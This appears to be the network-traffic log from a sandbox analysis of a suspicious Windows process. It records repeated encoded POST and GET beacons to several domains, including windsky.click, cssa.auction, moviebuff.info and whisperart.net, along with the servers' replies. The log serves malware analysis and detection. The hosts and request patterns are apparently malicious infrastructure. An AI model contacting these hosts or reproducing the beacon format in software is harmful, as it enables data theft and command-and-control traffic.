                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDyvLRKrBioCKmvf6aXgTAEgbKYugIQwqqDeBuua3H4+no4QgLA==
                                                                Jan 11, 2025 05:11:37.668147087 CET  774  IN  HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                22 | 192.168.2.7 | 49998 | 46.253.5.221 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:39.396920919 CET | 728 | OUT | POST /gybb/ HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:40.201736927 CET | 774 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                23 | 192.168.2.7 | 49999 | 46.253.5.221 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:41.940936089 CET | 1741 | OUT | POST /gybb/ HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.windsky.click
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.windsky.click/gybb/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:42.759365082 CET | 774 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Content-Encoding: gzip


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                24 | 192.168.2.7 | 50000 | 46.253.5.221 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:44.484338999 CET | 450 | OUT | GET /gybb/?-Jkp4f=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO/PgAZiplqYTotaLlxgtEc2zUWGdFSG0ILTc8yK+SY1eYqYdzLV7iMcxS&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.windsky.click
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:45.286318064 CET | 985 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sat, 11 Jan 2025 04:11:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Content-Language: en
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Referrer-Policy: origin-when-cross-origin
                                                                X-XSS-Protection: 1; mode=block
                                                                Expect-CT: enforce; max-age=3600
                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                Strict-Transport-Security: max-age=63072000
                                                                Data Ascii: 1f8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="styles.css"> <title>Maitance message</title> </head> <body> <div class="maintenance-message"> <h1>The website is undergoing maintenance. Please come back later.</h1> </div> </body> </html> 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                25 | 192.168.2.7 | 50001 | 107.167.84.42 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:51.019176006 CET | 705 | OUT | POST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:51.567260981 CET | 992 | IN | HTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:51 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                26 | 192.168.2.7 | 50002 | 107.167.84.42 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:53.568902969 CET | 725 | OUT | POST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:54.116445065 CET | 992 | IN | HTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:54 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                27 | 192.168.2.7 | 50003 | 107.167.84.42 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:56.114789963 CET | 1738 | OUT | POST /rjvg/ HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.cssa.auction
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.cssa.auction/rjvg/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:56.683727026 CET | 992 | IN | HTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:56 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                28 | 192.168.2.7 | 50004 | 107.167.84.42 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:11:58.656742096 CET | 449 | OUT | GET /rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.cssa.auction
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:59.209815025 CET | 1160 | IN | HTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:59 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                29 | 192.168.2.7 | 50005 | 209.74.77.109 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:04.260195971 CET | 711 | OUT | POST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM26GYEaKrqZCYppNRALtXccoikXiZ7LJUxTsDGpgwkw6cFVBkGOA==
                                                                Jan 11, 2025 05:12:04.843435049 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:04 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                30 | 192.168.2.7 | 50006 | 209.74.77.109 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:06.801193953 CET | 731 | OUT | POST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5afTg9NcvJERtHekCEFvN5vYTFCYwmvMaYbjArPgMDZX9ueY6c=
                                                                Jan 11, 2025 05:12:07.376384974 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:07 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                31 | 192.168.2.7 | 50007 | 209.74.77.109 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:09.540302038 CET | 1744 | OUT | POST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f= [TRUNCATED]
                                                                Jan 11, 2025 05:12:10.244792938 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:10 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                32 | 192.168.2.7 | 50008 | 209.74.77.109 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:12.077794075 CET | 451 | OUT | GET /4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY1 HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:12:12.676372051 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:12 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.7 | 50009 | 199.59.243.228 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:17.783098936 CET | 711 | OUT | POST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=4B9Qn/Iw/DjIbM1SIwS5GMvSqANTlh9OV1oz2zzPZ1bVpb2CRBv+v5Z0sf+TugN96ZdKFSMIEm1FtPDRxu/VwLd0E00Bd9Jvo4TO/sZH+TnOG6dhXX8QKV9t+Kk4xaou/752+p5a7Eqm7tuzGxJz+tz1dRhfLXohs6cgfbeUXdWPLnEIRbwW37I+6HtdPYp6AdGR9DPoZNYWyarg4w==
                                                                Jan 11, 2025 05:12:18.242116928 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:17 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: bd24774d-bb6c-441b-ac91-50e62fbda6de
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=bd24774d-bb6c-441b-ac91-50e62fbda6de; expires=Sat, 11 Jan 2025 04:27:18 GMT; path=/
                                                                connection: close
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                Jan 11, 2025 05:12:18.242187023 CET | 575 | IN
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmQyNDc3NGQtYmI2Yy00NDFiLWFjOTEtNTBlNjJmYmRhNmRlIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.7 | 50010 | 199.59.243.228 | 80
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Jan 11, 2025 05:12:20.332845926 CET | 731 | OUT | POST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Ascii: -Jkp4f=4B9Qn/Iw/DjIatFSJXG5HsvRpANT8x9KV1kz23jfeALVq6GCegv+/pZ0j/+sgAN66YhsFTwIEmxFtK/Rx5DKq7d6dk0HZ9Jvo4TO/sNt+T/OGLthXzITH19s5Kk4mKoq/75Q+sYH7GSm7oSzGAJwndzzQxghL2dSs51beJO3PqTkHxFqL586pqwF+FJrY+0PCcCJwh7JG698/IKkuLX8KWl7u4J44wyRILe4PL0=
Jan 11, 2025 05:12:20.814001083 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:20 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: 3eb11adc-2a4a-4898-a906-90c4a54d7226
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=3eb11adc-2a4a-4898-a906-90c4a54d7226; expires=Sat, 11 Jan 2025 04:27:20 GMT; path=/
                                                                connection: close
